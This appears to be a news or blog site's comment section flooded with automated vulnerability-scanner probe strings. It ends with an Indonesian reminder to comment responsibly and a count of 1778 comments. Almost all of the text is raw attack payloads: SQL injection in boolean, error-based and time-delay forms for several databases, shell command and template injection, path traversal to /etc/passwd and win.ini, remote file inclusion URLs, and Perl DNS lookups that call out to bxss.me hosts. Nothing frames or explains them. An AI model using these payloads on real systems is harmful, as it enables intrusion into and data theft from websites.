123456
123456'and/**/extractvalue(1,concat(char(126),md5(1407178881)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1375183850)))and"
extractvalue(1,concat(char(126),md5(1319990624)))
123456'and(select'1'from/**/cast(md5(1592954037)as/**/int))>'0
${@var_dump(md5(885693439))};
'-var_dump(md5(782187438))-'
123456/**/and/**/cast(md5('1248033267')as/**/int)>0
123456 expr 934846787 + 824842149
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1374152379')))
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1639799183')))>'0
123456?'"\(
123456|expr 893770950 + 844051656
123456'"\(
123456$(expr 996161358 + 915836150)
123456&set /A 840424614+827520450
expr 825914392 + 975192835
${917863553+837264741}
/*1*/{{886520905+932094917}}
${965183004+849490176}
${(824470127+904412338)?c}
#set($c=934471681+977710455)${c}$c
<%- 848792885+988733607 %>
123456/**/and+3=3
123456/**/and+4=5
123456'and'y'='y
123456'and'o'='i
123456"and"e"="e
123456"and"h"="l
(select*from(select+sleep(0)union/**/select+1)a)
(select*from(select+sleep(2)union/**/select+1)a)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('d',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s
yckycwzvsozwyxsptacq
123456'and/**/extractvalue(1,concat(char(126),md5(1627359128)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1618126841)))and"
extractvalue(1,concat(char(126),md5(1212282414)))
123456/**/and+0=6
123456'and(select'1'from/**/cast(md5(1823806746)as/**/int))>'0
123456'and's'='s
123456/**/and/**/cast(md5('1836027790')as/**/int)>0
123456'and'a'='k
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1639282794')))
123456"and"g"="g
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1187047809')))>'0
123456"and"p"="n
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('n',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',2)='g
dqzrmgxxzvqfajuflojf
123456'and/**/extractvalue(1,concat(char(126),md5(1615912374)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1298745246)))and"
extractvalue(1,concat(char(126),md5(1863758866)))
123456'and(select'1'from/**/cast(md5(1417700294)as/**/int))>'0
123456/**/and/**/cast(md5('1837362281')as/**/int)>0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1284297468')))
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1066354358')))>'0
123456/**/and+4=4
123456/**/and+3=6
123456'and'c'='c
123456'and'k'='x
123456"and"q"="q
123456"and"g"="r
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('p',0)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('u',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',2)='p
123456 expr 862033740 + 847302539
123456|expr 948047164 + 807985560
123456$(expr 988534011 + 875788295)
123456&set /A 904991634+841708639
123456/**/and+0=0
expr 952594333 + 805711240
123456/**/and+0=7
123456'and'l'='l
123456'and/**/extractvalue(1,concat(char(126),md5(1464371436)))and'
123456'and'a'='s
123456"and/**/extractvalue(1,concat(char(126),md5(1944240019)))and"
123456"and"w"="w
extractvalue(1,concat(char(126),md5(1136166254)))
123456"and"x"="s
123456'and(select'1'from/**/cast(md5(1439615048)as/**/int))>'0
${@var_dump(md5(368870291))};
'-var_dump(md5(959635050))-'
/*1*/{{857775183+931189555}}
${985068889+971048361}
${(875541619+949840218)?c}
123456/**/and/**/cast(md5('1947357220')as/**/int)>0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1477384067')))
#set($c=800203457+905477602)${c}$c
<%- 933192521+859592906 %>
mpbvauerckxqezjuuntl
${851036252+877531995}
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1686346806')))>'0
(select*from(select+sleep(3)union/**/select+1)a)
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('l',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',2)='h
123456'and/**/extractvalue(1,concat(char(126),md5(1431082569)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1705258482)))and"
extractvalue(1,concat(char(126),md5(1665394145)))
123456'and(select'1'from/**/cast(md5(1259650340)as/**/int))>'0
${@var_dump(md5(792860930))};
'-var_dump(md5(332074993))-'
123456/**/and/**/cast(md5('1070664842')as/**/int)>0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1764467240')))
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1815090267')))>'0
123456 expr 934289543 + 818000755
123456|expr 815344311 + 927336056
123456$(expr 966445583 + 809353281)
123456&set /A 903481420+996918737
expr 816556238 + 976306543
${815653175+907237595}
/*1*/{{801296657+916979508}}
${855932436+939693767}
${(896865630+849893364)?c}
itjtmbztjyghzwjeeian
#set($c=851361048+871699846)${c}$c
<%- 974036194+986416338 %>
123456/**/and+0=5
123456'and'i'='i
123456'and'r'='b
123456"and"f"="f
123456"and"x"="c
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('d',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('s',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',2)='d
1
123456'and/**/extractvalue(1,concat(char(126),md5(1962741651)))and'
123456/**/and+3=7
123456"and/**/extractvalue(1,concat(char(126),md5(1050595138)))and"
extractvalue(1,concat(char(126),md5(1765288269)))
123456'and(select'1'from/**/cast(md5(1276134435)as/**/int))>'0
123456'and'k'='k
123456'and'f'='y
123456/**/and/**/cast(md5('1946387628')as/**/int)>0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1433852249')))
123456"and"i"="w
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1307513889')))>'0
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('x',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',2)='o
ddxqtbvbnntxlzxbasrd
123456/**/and+3=8
123456'and'n'='n
123456'and'u'='g
123456"and"m"="m
123456"and"f"="a
123456'and/**/extractvalue(1,concat(char(126),md5(1322934908)))and'
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('n',0)
123456"and/**/extractvalue(1,concat(char(126),md5(1893568098)))and"
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('u',2)
extractvalue(1,concat(char(126),md5(1195893906)))
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t
123456'and(select'1'from/**/cast(md5(1995834936)as/**/int))>'0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',2)='i
123456/**/and/**/cast(md5('1546528859')as/**/int)>0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1269792196')))
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1724778725')))>'0
1kKzNLQpO
-1 OR 2+789-789-1=0+0+0+1 --
-1 OR 2+415-415-1=0+0+0+1
-1' OR 2+307-307-1=0+0+0+1 --
-1' OR 2+828-828-1=0+0+0+1 or 'gwbGAy3L'='
-1" OR 2+702-702-1=0+0+0+1 --
1*if(now()=sysdate(),sleep(15),0)
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1-1; waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
19YjaXkly'; waitfor delay '0:0:15' --
1-1 OR 446=(SELECT 446 FROM PG_SLEEP(15))--
${10000208+9999160}
1-1) OR 86=(SELECT 86 FROM PG_SLEEP(15))--
12345'"\'\");|]*{%0d%0a<>%bf%27'????
1-1)) OR 426=(SELECT 426 FROM PG_SLEEP(15))--
1N2WxTAjL' OR 311=(SELECT 311 FROM PG_SLEEP(15))--
1FngFhyqc') OR 658=(SELECT 658 FROM PG_SLEEP(15))--
response.write(9410887*9411857)
'+response.write(9410887*9411857)+'
"+response.write(9410887*9411857)+"
1bLhhLxFt')) OR 657=(SELECT 657 FROM PG_SLEEP(15))--
LI7dxM5p
1&n912251=v995542
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
https://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Http://bxss.me/t/fit.txt
https://bxss.me/t/fit.txt%3F.jpg
/etc/shells
c:/windows/win.ini
)
../../../../../../../../../../../../../../etc/passwd
!(()&&!|*|*|
../../../../../../../../../../../../../../windows/win.ini
bxss.me
file:///etc/passwd
^(#$!@#$)(()))******
../1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@2ROT3
'.gethostbyname(lc('hitbu'.'uwzqmqhna2383.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(90).chr(109).chr(80).'
".gethostbyname(lc("hitod"."woyhhngf092c7.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(65).chr(105).chr(69)."
gethostbyname(lc('hitjq'.'bmkzxhghf120e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(78).chr(113).chr(83)
xfs.bxss.me
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Berkomentarlah secara bijaksana, Komentar sepenuhnya menjadi tanggung jawab komentator seperti diatur dalam UU ITE
1778 Komentar